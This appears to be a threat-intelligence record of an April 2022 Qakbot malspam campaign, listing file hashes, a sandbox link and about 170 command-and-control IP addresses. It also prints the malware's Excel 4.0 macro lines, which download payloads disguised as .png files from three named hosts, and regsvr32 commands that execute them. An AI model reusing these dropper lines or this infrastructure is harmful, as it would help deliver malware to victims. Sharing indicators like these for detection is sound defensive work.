-
Notifications
You must be signed in to change notification settings - Fork 30
/
Copy pathQakbot_AA_18.04.2022.txt
191 lines (175 loc) · 4.17 KB
/
Qakbot_AA_18.04.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
14.04.2022 | Qakbot | AA | Version 403.573 | Campaign | 1650264998
******************************
.url https://danlle.com/ou/oinsenu
.zip 5fe43d7ccdd3f9e8c3f1149e690d56a9eb14d903546e8c5807b4afa7abfc8322
.xls 38f5a4e3d235e9045f23c1acf92fae6faae4ba9da1418cafc26e3f91e170772f
.dll b44ff94810d92c518d61ed33f4cf4161968802a0c4f599c6eb938d76b77df5fb
******************************
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Rfgsg", 0)
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://kenpong.com/07jMiafn/Asnhfn.png", "C:\Rfgsg\Ojijan.ooccxx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://taiyokagakuindia.com/uRl2nqDPMH/Asnhfn.png", "C:\Rfgsg\Ojijana.ooccxx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://shivalayatours.com/DAZYS42a/Asnhfn.png", "C:\Rfgsg\Ojijanb.ooccxx")
https://kenpong.com/07jMiafn/Asnhfn.png
https://taiyokagakuindia.com/uRl2nqDPMH/Asnhfn.png
https://shivalayatours.com/DAZYS42a/Asnhfn.png
*************************************************
Exec >>
EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\K-1605943503.xlsb
Regsvr32 /s calc
Regsvr32 C:\Rfgsg\Ojijan.ooccxx
Regsvr32 C:\Rfgsg\Ojijana.ooccxx
Regsvr32 C:\Rfgsg\Ojijanb.ooccxx
*************************************************
https://tria.ge/220418-wh1m4ahdfp
*************************************************
c2's
143.0.219.6:995
103.139.243.207:990
39.52.59.184:995
72.27.15.168:443
45.241.140.246:993
24.152.219.253:995
75.99.168.194:443
190.73.3.148:2222
24.43.99.75:443
74.15.2.252:2222
39.41.247.72:995
38.70.253.226:2222
108.60.213.141:443
47.23.89.62:993
176.67.56.94:443
2.50.4.57:443
101.109.214.129:443
148.64.96.100:443
140.82.49.12:443
76.25.142.196:443
85.101.204.178:443
39.44.144.159:995
1.161.67.235:443
85.104.122.231:443
47.23.89.62:995
111.125.245.118:995
5.54.50.169:995
217.164.76.203:2078
83.110.91.58:443
115.50.79.104:2222
39.49.56.93:995
86.97.11.43:443
46.107.48.202:443
179.174.52.27:32101
1.161.67.235:995
116.30.5.32:995
75.99.168.194:61201
176.205.23.170:1194
32.221.224.140:995
31.35.28.29:443
78.100.192.210:6883
187.207.47.198:61202
71.13.93.154:2222
117.248.109.38:21
173.174.216.62:443
45.9.20.200:443
149.28.238.199:443
149.28.238.199:995
144.202.2.175:443
45.76.167.26:995
140.82.63.183:995
144.202.3.39:443
140.82.63.183:443
45.76.167.26:443
144.202.3.39:995
45.63.1.12:995
144.202.2.175:995
45.63.1.12:443
70.46.220.114:443
103.88.226.30:443
86.98.156.198:993
180.183.97.165:2222
84.241.8.23:32103
103.87.95.133:2222
121.7.223.59:2222
37.186.54.254:995
182.191.92.203:995
24.178.196.158:2222
217.128.122.65:2222
78.100.234.143:2222
86.98.208.214:2222
172.114.160.81:995
175.145.235.37:443
202.134.152.2:2222
91.177.173.10:995
45.46.53.140:2222
120.150.218.241:995
203.122.46.130:443
85.246.82.244:443
173.21.10.71:2222
174.69.215.101:443
189.146.73.62:443
208.107.221.224:443
73.151.236.31:443
67.165.206.193:993
109.12.111.14:443
5.32.41.45:443
37.34.253.233:443
176.205.23.170:2222
41.129.82.125:995
41.84.229.11:995
191.99.191.28:443
41.38.167.179:995
103.107.113.120:443
43.252.72.97:2222
41.107.132.178:443
196.203.37.215:80
177.158.7.155:443
72.12.115.71:22
190.252.242.69:443
90.120.65.153:2078
179.158.105.44:443
109.228.220.196:443
180.129.102.214:995
102.182.232.3:995
184.100.157.205:443
72.76.94.99:443
72.66.116.235:995
47.158.25.67:443
47.180.172.159:443
77.104.81.12:443
93.48.80.198:995
80.11.74.81:2222
86.195.158.178:2222
81.215.196.174:443
92.132.172.197:2222
5.95.58.211:2087
159.146.13.189:995
41.228.22.180:443
94.140.8.13:2222
76.70.9.169:2222
114.79.148.170:443
187.250.114.15:443
201.145.179.247:443
187.172.232.250:443
47.156.191.217:443
47.180.172.159:50010
72.252.201.34:990
100.1.108.246:443
191.17.223.222:32101
70.51.152.186:2222
101.50.120.166:995
66.98.42.102:443
72.252.201.34:995
40.134.246.185:995
191.112.20.100:443
96.21.251.127:2222
82.152.39.39:443
31.48.166.122:2078
105.226.83.196:995
191.32.206.233:443
197.89.21.131:443
24.139.72.117:443
45.241.140.203:995
76.69.155.202:2222
121.74.167.191:995
187.251.132.144:22
187.102.135.142:2222
24.55.67.176:443
181.208.248.227:443